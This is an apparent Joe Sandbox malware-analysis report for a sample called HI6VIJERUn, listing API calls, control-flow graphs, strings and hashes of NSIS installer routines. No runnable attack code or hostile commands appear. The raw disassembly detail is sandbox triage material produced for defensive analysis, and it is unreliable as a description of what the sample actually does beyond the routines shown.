                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                          • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                          • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                          • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                                          Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                          • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                          • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                                          Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 825 406301-406315 FindFirstFileW 826 406322 825->826 827 406317-406320 FindClose 825->827 828 406324-406325 826->828 827->828
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                          • String ID: jF
                                                                                                                                                                                                                                                                                                          • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                          • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                          • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                          Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                                          Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                          • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                          • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                          • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
